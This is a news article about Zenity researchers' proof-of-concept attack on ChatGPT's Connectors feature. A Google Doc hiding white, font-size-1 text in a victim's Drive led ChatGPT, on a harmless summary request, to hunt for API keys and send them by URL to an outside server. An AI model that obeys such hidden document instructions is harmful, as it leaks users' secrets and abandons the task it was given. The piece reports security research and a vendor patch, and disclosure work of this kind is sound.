An invisible prompt in a Google Doc made ChatGPT access data from a victim’s Google Drive
Key Points
- Security researchers at Zenity showed that a single manipulated Google Doc, containing an invisible prompt, could make ChatGPT automatically extract and leak sensitive data from a user's Google Drive—without the user needing to take any action.
- The attack worked by exploiting OpenAI's "Connectors" feature, which links ChatGPT to services like Gmail and Microsoft 365. When the manipulated document appeared in a user's Drive, even a simple request could trigger the extraction and exfiltration of data such as API keys.
- OpenAI responded quickly to patch the specific vulnerability, but researchers note that as LLMs become more common in workplaces, similar attack methods remain technically possible and the risk of such exploits is likely to grow.
A single manipulated document was enough to get ChatGPT to automatically extract sensitive data—without any user interaction.
Security researchers at Zenity demonstrated that users could be compromised simply by having a document shared with them; no action was required on their part for data to leak. In their proof of concept, a Google Doc containing an invisible prompt—white text in font size 1—was able to make ChatGPT access data stored in a victim's Google Drive. The attack exploited OpenAI's "Connectors" feature, which links ChatGPT to services like Gmail or Microsoft 365.
If the manipulated document appears in a user's Drive, either through sharing or accidental upload, even a harmless request like "Summarize my last meeting with Sam" could trigger the hidden prompt. Instead of providing a summary, the model would search for API keys and send them via URL to an external server.
Growing use of LLMs in the workplace creates new attack surfaces
OpenAI was notified early and quickly patched the specific vulnerability demonstrated at the Black Hat conference. The exploit was limited in scope—entire documents could not be transferred, only small amounts of data were exfiltrated.
Despite the fix, the underlying attack method remains technically possible. As LLMs are increasingly integrated into workplace environments, researchers warn that the attack surface continues to expand.
AI News Without the Hype – Curated by Humans
As a THE DECODER subscriber, you get ad-free reading, our weekly AI newsletter, the exclusive "AI Radar" Frontier Report 6× per year, access to comments, and our complete archive.
Subscribe now